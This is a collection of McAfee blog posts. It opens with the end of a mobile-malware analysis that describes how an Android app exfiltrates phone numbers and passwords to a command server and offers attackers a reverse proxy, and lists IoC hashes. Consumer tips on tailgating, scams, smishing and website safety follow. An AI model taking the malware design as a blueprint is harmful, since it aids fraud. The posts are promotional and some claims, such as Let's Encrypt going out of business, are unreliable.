There is a native library named ‘’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Service password out to the attacker when the user enters the Service password on the activity. 

RPC Function name  Description 
connect_to  Create reverse proxy and connect to remote server 
disconnect  Disconnect the reverse proxy 
get_status  Send the reverse proxy status 
get_info  Send line number, connection type, operator, and so on 
toggle_wifi  Set the Wi-Fi ON/OFF 
show_battery_opt  Show dialog to exclude battery optimization for background work 

Registered RPC functions description 

Initial Hello packet contains personal information
Initial Hello packet contains personal information
Sending out The Service password
Sending out The Service password

To make a fraudulent purchase by using leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection state to Wi-Fi or cellular network, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the user’s network. 

Network and command flow diagram
Network and command flow diagram


It is an interesting point that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications. 

IoCs (Indicators of Compromise) 


SHA256  Package Name  Distribution  
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd  Google Play 
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0  Other 
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02  com.z.px.appx  Google Play 
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad  Other 
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4  com.jg.rc.papp  Google Drive 
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956  Google Drive 


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What Are Tailgating Attacks and How to Protect Yourself From Them

By McAfee — November 29th 2022 at 13:46

Whether you’re spending time on the web or working in the office, you want peace of mind knowing that you are in a safe environment. While most of us know to take precautions when online — protecting ourselves from things like phishing attacks and other cyber threats — we should also attend to our physical security. 

One concern is tailgating — a social engineering attack where someone gets physical access to a business to take confidential information or do other harm. 

Here are some ways to protect yourself from tailgating attacks, such as an unauthorized person following you into a restricted area while on the job. 

What is a tailgating attack?

Tailgating is a type of social engineering attack where an unauthorized person gains physical access to an off-limits location — perhaps a password-protected area — where they might steal sensitive information, damage property, compromise user credentials or even install malware on computers. 

Piggybacking” is closely related to tailgating, but it involves consent from the duped employee. So, while a worker might be unaware that someone has tailgated them into a restricted area with piggybacking, the hacker might convince a worker to provide access because they are posing as, say, a delivery driver. 

Who’s at risk of tailgating attacks?

Companies, particularly at risk of being targeted by tailgating scams, include those: 

  • With many employees, often moving inside and out of the premises 
  • With multiple entrance points into a building 
  • That receive deliveries of food, packages, documents, and other things regularly 
  • That have many subcontractors working for them 
  • Where employees aren’t thoroughly trained in physical and cybersecurity protocols 

Generally speaking, companies with robust security systems in place — including using biometrics, badges, or other identity and information security measures — are better protected from tailgating and piggybacking attacks.  

But that’s not to say that some smooth-talking fraudster can’t talk someone into letting them in or finding some way around those protections. 

What are common tailgating methods?

Common types of tailgating attacks that you should be aware of on the job include:  

  • Someone walking behind you into a secure area, depending on your common courtesy to keep the door open for them 
  • A courier or delivery driver who aren’t what they seem 
  • Someone with their hands full of items to trick you into opening the door for them 
  • A person who claims they’ve lost their work ID or forgotten it at home, so that you grant them admittance 

How to protect yourself from tailgating attacks 

Protecting yourself from tailgating attacks is partly a matter of learning about the issue, raising your level of awareness on the job, and depending on your employer, putting in place more effective security systems.  

Some solutions include: 

Increased security training

Many companies know how to train employees to recognize, avoid, and cope with online security issues but may forget to provide the same diligence to physical security. How to spot and deal with threats should be part of this training, plus cultivating an awareness of surroundings and people who might be out of place.   

Management should offer a clearly stated security policy taught to everyone, which might insist that no one be allowed into a secure area without the proper pass or identification. As the security policy is updated, all employees should be aware of changes and additions. 

These security measures should be part of an overall protection program, like McAfee+, which includes antivirus software, a firewall, identity monitoring, password management, web protection, and more. 

Smart badges and cards

If you have a large business spread over several floors, it can be hard for employees to know who works there and who doesn’t, leaving them susceptible to tailgating and piggybacking attacks. Requiring smart badges and cards to access restricted areas can help cut back on unauthorized intrusions and provide better access control. 

Building fully staffed reception areas with dedicated security personnel could also be part of a larger security system. 

Biometric scanners

Biometric scanners are an even more advanced way to provide proper authentication for a worker’s identity. They scan a unique physical or audible feature of a person and compare it to a database for approved personnel.  

Examples of biometric security include: 

  • Voice recognition 
  • Iris recognition 
  • Fingerprint scans 
  • Facial recognition 
  • Heart-rate sensors 

Understanding social engineering

One reason people are vulnerable to physical and cyberattacks is that they lack education on social engineering and the kinds of threats it poses.  

Workers need to understand the full range of social engineering techniques and know-how to protect themselves, whether in their social media accounts or physical work environment.  

For their part, companies can use simulated phishing emails and tailgating attacks to raise awareness and underline how to follow protocols in dealing with them. 

Video surveillance

If there are many ways to enter a business, it may make sense to put video surveillance on all entrances. Advanced video surveillance systems can use artificial intelligence (AI) and video analytics to scan the faces of people entering and compare them to a database of employee features. 

Discover how McAfee can help keep devices secure from hacking

Whether at work or at home, people want to be secure from attacks by cybercriminals who seek to take personal information. 

To add a layer of security to all their connected devices — including computers, smartphones, and tablets — an increasing number of people are turning to the comprehensive coverage of McAfee+ 

Features range from advanced monitoring of possible threats to your identity, automatic implementation of virtual private networks (VPNs) to deal with unsafe networks, and personal data clean-up, removing your information from high-risk data broker sites. 

McAfee protection allows you to work and play online with greater peace of mind. 

The post What Are Tailgating Attacks and How to Protect Yourself From Them appeared first on McAfee Blog.

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McAfee Personal Data Cleanup: Your Partner in Living a More Private Online Life

By McAfee — November 28th 2022 at 10:23

Do yourself a favor: Open a new browser tab and head to your search engine of choice. Type in your full name and home address. Then, see what pops up. 

Are the results sparking an ember of unease in the back of your brain? Whether you’re a private person online or you’re comfortable sharing your daily life updates on social media, there are likely to be several personal details about you on sites that shouldn’t have that information. Some of these sites may be data brokerage websites.  

Data brokerage sites are legal and are mostly used by annoying advertisers, though cybercriminals may also use them maliciously. The average person has their information for sale on 31 data brokerage sites, and 95% of people have their personal information on sale without their permission. 

So how do you scrub the internet of your personal details to keep your identity secure? McAfee Personal Data Cleanup is a service that prevents your personal information from being collected and sold online. Here’s why you should consider taking a few easy steps now to give you peace of mind about the security of your personally identifiable information (PII). 

Make Your Attack Surface as Small as Possible 

Attack surface is a term usually applied to corporate security, but it’s a great visualization for everyday people going about their personal online errands and entertainment. An attack surface is the number of possible entry points a cybercriminal could weasel their way through to get at your valuable and private information. Entry points include your social media profiles, your online shopping accounts, and data brokerage sites. The fewer entry points you have, the harder it is for cybercriminals to find and exploit them. 

While Social Security Numbers (SSNs) are generally revered as the piece of PII to guard most closely, a cybercriminal can still damage your identity with just your name and an address, email address, or phone number. For example, they can request new passwords or multifactor authentication one-time passcodes to break their way into online banking or shopping accounts. Security breaches are happening to huge companies all over the world. All it takes is for your SSN to be leaked in one of them, for a cybercriminal to piece together your digital clone and use it to harm your identity or credit. 

Personal Data Cleanup minimizes your attack surface by removing as much PII as possible that’s floating around the internet, just waiting for someone to buy it.  

Give Yourself a Blank Online Slate 

When you’re aware of how many unauthorized vendors are selling your PII, it could be the wakeup call you need start adopting more cautious online habits. For instance, oversharing on social media leaks a lot of valuable details that a savvy criminal can then use to take educated guesses at your passwords or craft a social engineering plot catered just to you. 

The present is as good a time as any to start protecting your identity for the future; however, getting started is often the most difficult step. It can seem overwhelming to reach out to every data brokerage site individually and request they remove your info. Personal Data Cleanup can be your partner not only in beginning the cleanup process but in monitoring your data security to keep your online presence as minimal as possible. The service scans the internet’s riskiest sites and then, before deleting your information from these sites, runs it by you to confirm. Then, it will continually monitor those same sites, as your information will likely reappear every two to four months. 

Cleaning Up Your Data Is So Easy, There’s No Reason Not To 

Do not underestimate the tenacity of a cybercriminal. Even for people who have the attitude that their PII is bound to be somewhere online and that it’s no big deal, McAfee Personal Data Cleanup manages three key steps in the data removal process: scanning, removing, and monitoring. So, even if you’re not convinced that data brokerage sites are a threat, the process is too easy to put off any longer! 

For those who are concerned about their online privacy, full-service Personal Data Cleanup is included in McAfee+ Ultimate, which is the complete package to let you live your online life in private. McAfee+ Ultimate also includes identity monitoring and identity theft resolution services, unlimited VPN, credit lock, and much more.  

In 2021, more than 1.4 million identity theft complaints were filed to the Federal Trade Commission.1 Identity theft can occur to anyone, so take steps today, starting with data brokerage sites, to live a more secure and more private digital life. 

1Federal Trade Commission, “New Data Shows FTC Received 2.8 Million Fraud Reports from Consumers in 2021 

The post McAfee Personal Data Cleanup: Your Partner in Living a More Private Online Life appeared first on McAfee Blog.

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“This Connection Is Not Private” – What it Means and How to Protect Your Privacy

By McAfee — November 22nd 2022 at 21:44

Have you ever been browsing online and clicked a link or search result that took you to a site that triggers a “your connection is not private” or “your connection is not secureerror code? If you’re not too interested in that particular result, you may simply move on to another result option. But if you’re tempted to visit the site anyway, you should be sure you understand what the warning means, what the risks are, and how to bypass the error if you need to.   

What does “this connection is not private” mean?

A “your connection is not private” error means that your browser cannot determine with certainty that a website has safe encryption protocols in place to protect your device and data. You can bump into this error on any device connected to the internet — computer, smartphone, or tablet.  

So, what exactly is going on when you see the “this connection is not private” error?  

For starters, it’s important to know that seeing the error is just a warning, and it does not mean any of your private information is compromised. A “your connection is not privateerror means the website you were trying to visit does not have an up-to-date SSL (secure sockets layer) security certificate. 

Website owners must maintain the licensing regularly to ensure the site encryption capabilities are up to date. If the website’s SSL certificate is outdated, it means the site owners have not kept their encryption licensing current, but it doesn’t necessarily mean they are up to no good. Even major websites like LinkedIn have had momentary lapses that would throw the error. LinkedIn mistakenly let their subdomain SSL certificates lapse.  

In late 2021, a significant provider of SSL certificates, Let’s Encrypt, went out of business. When their root domain officially lapsed, it created issues for many domain names and SSL certificates owned by legitimate companies. The privacy error created problems for unwitting businesses, as many of their website visitors were rightfully concerned about site security.  

While it does not always mean a website is unsafe to browse, it should not be ignored. A secure internet connection is critical to protecting yourself online. Many nefarious websites are dangerous to visit, and this SSL certificate error will protect you from walking into them unaware.   

SSL certification standards have helped make the web a safer place to transact. It helps ensure online activities like paying bills online, ordering products, connecting to online banking, or keeping your private email accounts safe and secure. Online security continues to improve with a new Transport Layer Security (TLS) standard, which promises to be the successor protocol to SSL. 

So be careful whenever visiting sites that trigger the “connection is not private” error, as those sites can potentially make your personal data less secure and make your devices vulnerable to viruses and malware 

Note: The “your connection is not private” error is Google Chrome‘s phrasing. Microsoft Edge or Mozilla Firefox users will instead see a “your connection is not secure” error as the warning message.   

How to fix the “connection is not private” error

If you feel confident that a website or page is safe, despite the warning from your web browser, there are a few things you can do to troubleshoot the error.  

  • Refresh the page. In some cases, the error is just a momentary glitch. Try reloading the page to rule out a temporary error.  
  • Close browser and reopen. Closing and reopening your web browser might also help clear a temporary glitch.  
  • If you’re on public WiFi, think twice. Hackers often exploit public WiFi because their routers are usually not as secure or well-maintained for security. Some public WiFi networks may not have an SSL connection, or they may limit your access to websites. You can safely browse more securely in public spaces if you have an antivirus software or virtual private network (VPN) solution. 
  • Use “Incognito” mode. The most used browsers (Google Chrome browser, Mac‘s Safari, Mozilla Firefox, and Microsoft Edge) offer an “Incognito mode” that lets you browse without data collecting in your history or cache. Open the site in a new incognito window and see if the error still appears.  
  • Clear the cache on your browser. While cookies make browsing the web more convenient and personalized, they also can hold on to sensitive information. Hackers will take advantage of cached data to try and get passwords, purchase information, and anything else they can exploit. Clear browsing data before going to a site with the “connection is not secure” error to help limit available data for hackers 
  • Check the computer’s date and time. If you frequently see the “connection is not private” error, you should check and ensure your computer has the accurate time and date. Your computer’s clock can sometimes have time and date stamp issues and get glitchy in multiple ways. If it’s incorrect, adjust the date and set the time to the correct settings.  
  • Check your antivirus software. If your antivirus software is sensitive, you may have to disable it momentarily to bypass the error. Antivirus software protects you, so you should be careful to remember to turn the software back on again after you’ve bypassed the error.  
  • Be sure your browsers and operating systems are up to date. You should always keep your critical software and the operating system fully updated. An outdated browser can start getting buggy and can increase the occurrence of this kind of error.  
  • Research the website. Do a quick search for the company of the website you wish to visit and make sure they are a legitimate business. You can search for reviews, Better Business Bureau ratings, or check for forums to see if others are having the same issue. Be sure you are spelling the website address correctly and that you have the correct URL for the site. Hackers can take advantage of misspellings or alternative URLs to try and snare users looking for trusted brands. 
  • If it’s not you, it’s them. If you’ve tried all the troubleshooting techniques above and you still see the error, the problem is likely coming from the site itself. If you’re willing to take your chances (after clearing your browser’s cache), you can click the option to “proceed to the domain,” though it is not recommended. You may have to choose “advanced settings” and click again to visit the site.   

Remember, you are taking your chances anytime you ignore an error. As we mentioned, you could leave yourself vulnerable to hackers after your passwords, personal information, and other risks.  

How to protect your privacy when browsing online

Your data and private information are valuable to hackers, so they will continue to find new ways to try and procure it. Here are some ways to protect yourself and your data when browsing online.  

  • Antivirus solutions are, hands down, your best line of protection against hacking. Solutions like McAfee+ Ultimate offer all the tools you need to secure your data and devices.  
  • Use strong passwords and two-factor authentication when available. 
  • Delete unused browser extensions (or phone apps) to reduce access. 
  • Always keep your operating system and browsers up-to-date. You can open system preferences and choose to update your system automatically. 
  • Use a secure VPN solution to shield your data when browsing. 
  • Use your favorite browser’s incognito mode to reduce the data connected to your devices. 
  • Remove any 3rd party apps from your social media accounts — especially if you’ve recently taken a Facebook quiz or similar (also, don’t take Facebook quizzes). 
  • Engage the highest privacy settings in each of your browsers. 
  • Always check the address bar for HTTPS before sharing credit cards or other sensitive data on a website. 
  • Share less personal and private information on social media.  

Discover how McAfee keeps you and your data safe from threats

As we continue to do more critical business online, we must also do our best to address the risks of the internet’s many conveniences.  

A comprehensive cybersecurity tool like McAfee+ Ultimate can help protect you from online scams, identity theft, and phishing attempts, and ensure you always have a secure connection. McAfee helps keep your sensitive information out of the hands of hackers and can help you keep your digital data footprints lighter with personal data cleanup.  

With McAfee’s experts on your side, you can enjoy everything the web offers with the confidence of total protection. 

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How to Tell Whether a Website Is Safe or Unsafe

By McAfee — November 22nd 2022 at 20:49

It’s important to know that not all websites are safe to visit. In fact, some sites may contain malicious software (malware) that can harm your computer or steal your personal contact information or credit card numbers.  

Phishing is another common type of web-based attack where scammers try to trick you into giving them your personal information, and you can be susceptible to this if you visit a suspicious site.  

Identity theft is a serious problem, so it’s important to protect yourself when browsing the web. Online security threats can be a big issue for internet users, especially when visiting new websites or following site links. 

So how can you tell if you’re visiting a safe website or an unsafe website? You can use a few different methods. This page discusses key things to look for in a website so you can stay safe online. 

Key signs of website safety and security

When you’re visiting a website, a few key indicators can help determine whether the site is safe. This section explores how to check the URL for two specific signs of a secure website. 

”Https:” in the website URL

“Https” in a website URL indicates that the website is safe to visit. The “s” stands for “secure,” and it means that the website uses SSL (Secure Sockets Layer) encryption to protect your information. A verified SSL certificate tells your browser that the website is secure. This is especially important when shopping online or entering personal information into a website. 

When you see “https” in a URL, the site is using a protocol that encrypts information before it’s sent from your computer to the website’s server. This helps prevent anyone from intercepting and reading your sensitive information as it’s transmitted. 

A lock icon near your browser’s URL field

The padlock icon near your browser’s URL field is another indicator that a webpage is safe to visit. This icon usually appears in the address bar and means the site uses SSL encryption. Security tools and icon and warning appearances depend on the web browser. 

Let’s explore the cybersecurity tools on the three major web browsers: 

  • Safari. In the Safari browser on a Mac, you can simply look for the lock icon next to the website’s URL in the address bar. The lock icon will be either locked or unlocked, depending on whether the site uses SSL encryption. If it’s an unsafe website, Safari generates a red-text warning in the address bar saying “Not Secure” or “Website Not Secure” when trying to enter information in fields meant for personal data or credit card numbers. Safari may also generate an on-page security warning stating, “Your connection is not private” or “Your connection is not secure.” 
  • Google Chrome. In Google Chrome, you’ll see a gray lock icon (it was green in previous Chrome versions) on the left of the URL when you’re on a site with a verified SSL certificate. Chrome has additional indicator icons, such as a lowercase “i” with a circle around it. Click this icon to read pertinent information on the site’s cybersecurity. Google Safe Browsing uses security tools to alert you when visiting an unsafe website. A red caution symbol may appear to the left of the URL saying “Not secure.” You may also see an on-page security message saying the site is unsafe due to phishing or malware. 
  • Firefox. Like Chrome, Mozilla’s Firefox browser will tag all sites without encryption with a distinctive marker. A padlock with a warning triangle indicates that the website is only partially encrypted and may not prevent cybercriminals from eavesdropping. A padlock with a red strike over it indicates an unsafe website. If you click on a field on the website, it’ll prompt you with a text warning stating, “This connection is not secure.” 

In-depth ways to check a website’s safety and security

Overall, the ”https” and the locked padlock icon are good signs that your personal data will be safe when you enter it on a website. But you can ensure a website’s security is up to par in other ways. This section will explore five in-depth methods for checking website safety. 

Use McAfee WebAdvisor

McAfee WebAdvisor is a free toolbar that helps keep you safe online. It works with your existing antivirus software to provide an extra layer of protection against online threats. WebAdvisor also blocks unsafe websites and lets you know if a site is known for phishing or other malicious activity. In addition, it can help you avoid online scams and prevent you from accidentally downloading malware. Overall, McAfee WebAdvisor is a useful tool that can help you stay safe while browsing the web. 

Website trust seals

When you’re browsing the web, it’s important to be able to trust the websites you’re visiting. One way to determine if a website is trustworthy is to look for trust seals. Trust seals are logos or badges that indicate a website is safe and secure. They usually appear on the homepage or checkout page of a website. 

There are many types of trust seals, but some of the most common include the Better Business Bureau (BBB) seal, VeriSign secure seal, and the McAfee secure seal. These seals indicate that a third-party organization has verified the website as safe and secure. 

While trust seals can help determine whether a website is trustworthy, it’s important to remember that they are not foolproof. Website owners can create a fake trust seal, so it’s always important to do your own research to ensure a website is safe before entering personal information. 

Check for a privacy policy

Another way to determine if a website is safe to visit is to check for a privacy policy. A privacy policy is a document that outlines how a website collects and uses personal information. It should also state how the site protects your data from being accessed or shared by scammers, hackers, or other unauthorized individuals. 

If a website doesn’t have a privacy policy, that’s a red flag that you shouldn’t enter any personal information on the site. Even if a website does have a privacy policy, it’s important to read it carefully so you understand how the site uses your personal data. 

Check third-party reviews

It’s important to do some preliminary research before visiting a new website, especially if you’re shopping online or entering personal data like your address, credit card, or phone number. One way to determine if a website is safe and trustworthy is to check third-party reviews. Several websites provide reviews of other websites, so you should be able to find several reviews for any given site.  

Trustpilot is one example of a website that provides reviews of other websites. 

Look for common themes when reading reviews. If most of the reviews mention that a website is safe and easy to use, it’s likely that the site is indeed safe to visit. However, if a lot of negative reviews mention problems with viruses or malware, you might want to avoid the site. 

Look over the website design

You can also analyze the website design when deciding whether a website is safe to visit. Look for spelling errors, grammatical mistakes, and anything that appears off. If a website looks like it was made in a hurry or doesn’t seem to be well-designed, that’s usually a red flag that the site might not be safe. 

Be especially careful of websites that have a lot of pop-ups. These sites are often spammy or contain malware. Don’t download anything from a website unless you’re absolutely sure it’s safe. These malicious websites rarely show up on the top of search engine results, so consider using a search engine to find what you’re looking for rather than a link that redirects you to an unknown website. 

Download McAfee WebAdvisor for free and stay safe while browsing

If you’re unsure whether a website is safe to visit, download McAfee WebAdvisor for free. McAfee WebAdvisor is a program that helps protect you from online threats, such as malware and viruses. It also blocks pop-ups and other intrusive ads so you can browse the web without worry. Plus, it’s completely free to download and use. 

Download McAfee WebAdvisor now and stay safe while browsing the web. 

The post How to Tell Whether a Website Is Safe or Unsafe appeared first on McAfee Blog.

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Watch Out for These 3 World Cup Scams

By McAfee — November 21st 2022 at 21:29

What color jersey will you be sporting this November and December? The World Cup is on its way to television screens around the world, and scores of fans are dreaming of cheering on their team at stadiums throughout Qatar. Meanwhile, cybercriminals are dreaming of stealing the personally identifiable information (PII) of fans seeking last-minute vacation and ticket deals. 

Don’t let the threat of phishers and online scammers dampen your team spirit this World Cup tournament. Here are three common schemes cybercriminals will likely employ and a few tips to help you dribble around their clumsy offense and protect your identity, financial information, and digital privacy. 

1. Fake Contests

Phishers will be out in full force attempting to capitalize on World Cup fever. People wrapped up in the excitement may jump on offers that any other time of the year they would treat with skepticism. For example, in years past, fake contests and travel deals inundated email inboxes across the world. Some companies do indeed run legitimate giveaways, and cybercriminals slip in their phishing attempts among them. 

If you receive an email or text saying that you’re the winner of a ticket giveaway, think back: Did you even enter a contest? If not, treat any “winner” notification with skepticism. It’s very rare for a company to automatically enter people into a drawing. Usually, companies want you to act – subscribe to a newsletter or engage with a social media post, for example – in exchange for your entry into their contest. Also, beware of emails that urge you to respond within a few hours to “claim your prize.” While it’s true that real contest winners must reply promptly, organized companies will likely give you at least a day if not longer to acknowledge receipt. 

2. Travel Scams

Traveling is rarely an inexpensive endeavor. Flights, hotels, rental cars, dining costs, and tourist attraction admission fees add up quickly. In the case of this year’s host country, Qatar, there’s an additional cost for American travelers: visas.  

If you see package travel deals to the World Cup that seem too good to pass up … pass them up. Fake ads for ultra-cheap flights, hotels, and tickets may appear not only in your email inbox but also on your social media feed. Just because it’s an ad doesn’t mean it comes from a legitimate company. Legitimate travel companies will likely have professional-looking websites with clear graphics and clean website copy. Search for the name of the organization online and see what other people have to say about the company. If no search results appear or the website looks sloppy, proceed with caution or do not approach at all. 

Regarding visas, be wary of anyone offering to help you apply for a visa. There are plenty of government-run websites that’ll walk you through the process, which isn’t difficult as long as you leave enough time for processing. Do not send your physical passport to anyone who is not a confirmed government official. 

3. Malicious Streaming Sites

Even fans who’ve given up on watching World Cup matches in person aren’t out of the path of scams. Sites claiming to have crystal clear streams of every game could be malware spreaders in disguise. Malware and ransomware targeting home computers often lurk on sketchy sites. All it takes is a click on one bad link to let a cybercriminal or a virus into your device.  

Your safest route to good-quality live game streams is through the official sites of your local broadcasting company or the official World Cup site. You may have to pay a fee, but in the grand scheme of things, that fee could be a lot less expensive than replacing or repairing an infected device. 

Shore Up Your Defense With McAfee+ 

Here’s an excellent rule to follow with any electronic correspondence: Never send anyone your passwords, routing and account number, passport information, or Social Security Number. A legitimate organization will never ask for your password, and it’s best to communicate any sensitive financial or identifiable information over the phone, not email or text as they can easily fall into the wrong hands. Also, do not wire large sums of money to someone you just met online. 

Don’t let scams ruin your enjoyment of this year’s World Cup! With these tips, you should be able to avoid the most common schemes but to boost your confidence in your online presence, consider signing up for McAfee+. Think of McAfee+ as the ultimate goalkeeper who’ll block any cybercriminals looking to score on you. With identity monitoring, credit lock, unlimited VPN and antivirus, and more, you can surf safely and with peace of mind.  

The post Watch Out for These 3 World Cup Scams appeared first on McAfee Blog.

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Threat Actors Taking Advantage of FTX Bankruptcy 

By McAfee Labs — November 15th 2022 at 18:23

Authored by Oliver Devane 

It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX,  McAfee has discovered several phishing sites targeting FTX users.  

One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it. 

Upon analyzing the website code used to create the phishing sites, we noticed that they were extremely similar to previous sites targeting WalletConnect customers, so it appears that they likely just modified a previous phishing kit to target FTX users.  

The image below shows a code comparison between a website from June 2022, and it shows that the FTX phishing site shares most of its code with it.  

McAfee urges anyone who was using FTX to be weary of any unsolicited emails or social media messages they receive and to double-check the authenticity before accessing them. If you are unsure of the signs to look for, please check out the McAfee Scam education portal ( 

McAfee customers are protected against the sites mentioned in this blog 

Type  Value  Product  Detected 
URL  ftx-users-refund[.]com  McAfee WebAdvisor  Blocked 
URL  ftx-refund[.]com  McAfee WebAdvisor  Blocked 


The post Threat Actors Taking Advantage of FTX Bankruptcy  appeared first on McAfee Blog.

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Microsoft’s Edge over Popups (and Google Chrome)

By McAfee Labs — November 15th 2022 at 17:02

Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number of deceptive push notifications reported by McAfee consumers running Microsoft’s Edge browser on Windows.

Such browser-delivered push messages appear as toaster pop-ups in the tray above the system clock and are meant to trick users into taking various actions, such as installing software, purchasing a subscription, or providing personal information.

example of a deceptive push notification
example of a deceptive push notification

Upon further investigation, this major drop seems to be associated with a change in the behavior of the Edge browser with two notable improvements over older versions.

First, when users visit websites known to deliver deceptive push notifications, Edge blocks authorization prompts that could trick users into opting-in to receive popups:

Second, when unwanted popups do occur, it is now easier than ever to disable them, on a per-site basis.  Users can simply click the three dots (…) on the right of the notification and choose to “Turn off all notifications for” the domain responsible for the popup.

This is a great improvement over the previous experience of having to manually navigate browser settings to achieve the desired result.

Earlier this year, 9TO5Google reported a Chrome code change may be indicative of a similar crack down by Google on nefarious popups.

One can hope Google will follow Microsoft’s example to improve browser security and usability.

The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.

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What Is Smishing and Vishing, and How Do You Protect Yourself?

By McAfee — November 10th 2022 at 11:57

Smishing and vishing are scams where criminals attempt to get users to click a fraudulent link through a phone text message, email, or voicemail. These scams are becoming increasingly popular as cybercriminals try to take advantage of people who are more likely to fall for them, such as those who aren’t as familiar with technology or who may be experiencing a crisis. 

Be aware that cybercrime and hacking can happen to anyone. Criminals are always looking for new ways to exploit people, and they know that others may not be cautious or recognize the warning signs of phishing scams when using the internet. That’s why it’s important to be aware of the different types of cybercrime and how to protect yourself. 

This article discusses how to protect yourself from smishing attempts and scams where criminals try to get you to click on a fraudulent link or respond to their voicemail message to steal your personal data. 

What is smishing?

Most people are familiar with phishing scams, where scammers try to trick you into giving them your personal or financial information by pretending to be a legitimate company or organization. But have you ever heard of smishing or vishing? 

Smishing is a type of phishing scam where attackers send SMS messages (or text messages) to trick victims into sharing personal information or installing malware on their devices. Vishing is almost identical to smishing, except cybercriminals use VoIP (Voice over IP) to place phone calls to trick victims instead of SMS (short message service) messages. 

Smishing messages often appear to be from a legitimate source, such as a well-known company or government agency. It may even include urgent language or threats in an effort to get victims to act quickly. In some cases, the message may also include a link that directs victims to a fake website where they are prompted to enter personal information or download malware. 

Examples of a smishing text message

Here are some examples of smishing text messages hackers use to steal your personal details: 

  • “We have detected unusual activity on your account. Please call this number to speak to a customer service representative.” 
  • “You have won a free gift card! Click here to claim your prize.” 
  • “Hi! We noticed that you’re a recent customer of ours. To finish setting up your account, please click this link and enter your personal information.” 
  • “Urgent! Your bank account has been compromised. Please click this link to reset your password and prevent any further fraud.” 
  • “Hey, it’s [person you know]! I’m in a bit of a bind and could really use your help. I sent you a link to my PayPal, could you send me some money?” 

How dangerous can smishing be?

If you fall for a smishing scam, you could end up giving away your personal information or money. Cybercriminals use smishing messages to get personal and financial information, like your credit card number or access to your financial services 

For example, one type of smishing scam is when you get a text message that looks like it’s from your bank. The message might say there’s been suspicious activity on your account and that you need to click on a link to verify your identity. If you do click on the link, you’ll be taken to a fake website where you’ll be asked to enter your banking information. Once the scammers have your login information, they have access to clean out your account. 

How can you protect yourself from smishing?

Smishing scams can be very difficult to spot, but there are some telltale signs to look for and steps to take to protect yourself. 

Recognize the signs of a smishing text

One of the easiest ways to protect yourself from smishing scams is to be able to recognize the signs of a smishing text message. Here are some tips: 

  • Be suspicious of any text messages that ask for personal information or include a link. 
  • Look closely at the sender’s name and number. Fraudulent messages often come from spoofed numbers that may look similar to a legitimate number but with one or two digits off. 
  • Look for errors in spelling or grammar. This can be another sign that the message is not legitimate. 
  • Beware of any text messages that create a sense of urgency or are threatening in nature. Scammers often use these tactics to get you to act quickly without thinking. 
  • If you’re not expecting a message from the sender, be extra cautious. 
  • If you’re unsure whether a text message is legitimate, call the company or organization directly to verify. 

Filter unknown text messages

While you can’t avoid smishing attacks altogether, you can block spam text messages you receive on your mobile phone. iPhone and Android have cybersecurity tools like spam filters and phone number blocking to help protect you from phishing attacks and malicious links. 

To set up spam filters on your iPhone: 

  1. Go to the Settings App 
  2. Go to Messages 
  3. Find the Filter Unknown Senders option and turn it on 

To set up spam filters on your Android mobile device: 

  1. Go to the Messaging App 
  2. Choose Settings 
  3. Tap Spam Protection and turn on Enable Spam Protection 

Use McAfee Mobile Security 

McAfee Mobile Security is a mobile security app that helps protect your phone from malware, phishing attacks, and other online threats. McAfee Mobile Security is available for Android and iOS cell phones. 

One of the benefits of using McAfee Mobile Security is that it can help detect and block smishing attacks. With identity monitoring, McAfee Mobile Security monitors your sensitive information like email accounts, credit card numbers, phone numbers, Social Security numbers, and more to protect against identity theft. They notify you if they find any security breaches. 

Other benefits include: 

  • Antivirus 
  • Secure VPN for privacy online 
  • Identity monitoring for up to 10 emails 
  • Guard your identity against risky Wi-Fi connections 
  • Safe browsing 
  • System Scan for the latest updates 

Keep your device and information secure with McAfee Mobile Security

These days, our lives are more intertwined with our mobile devices than ever. We use them to stay connected with our loved ones on social media, conduct our business, and even access our most personal, sensitive data. It’s no surprise that mobile cybersecurity is becoming increasingly important. 

McAfee Mobile Security is a comprehensive security solution that helps protect your device from viruses, malware, and other online threats. It also offers a variety of other features, like a secure VPN to protect your credit card numbers and other personal data 

Whether you’re browsing your favorite website, keeping up with friends on social media, or shopping online at Amazon, McAfee Mobile Security provides the peace of mind that comes from knowing your mobile device is safe and secure. 

So why wait? Don‘t let the smishers win. Get started today with McAfee Mobile Security and rest easy knowing your mobile device and sensitive information are protected. 

The post What Is Smishing and Vishing, and How Do You Protect Yourself? appeared first on McAfee Blog.

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Don’t Get Caught Offsides with These World Cup Scams

By McAfee Labs — November 9th 2022 at 12:03

Authored by: Christy Crimmins and Oliver Devane

Football (or Soccer as we call it in the U.S.) is the most popular sport in the world, with over 3.5 billion fans across the globe. On November 20th, the men’s World Cup kicks off (pun intended) in Qatar. This event, a tournament played by 32 national teams every four years, determines the sport’s world champion. It will also be one of the most-watched sporting events of at least the last four years (since the previous World Cup). 

An event with this level of popularity and interest also attracts fraudsters and cyber criminals looking to capitalize on fans’ excitement. Here’s how to spot these scams and stay penalty-free during this year’s tournament. 

New Cup, who’s this? 

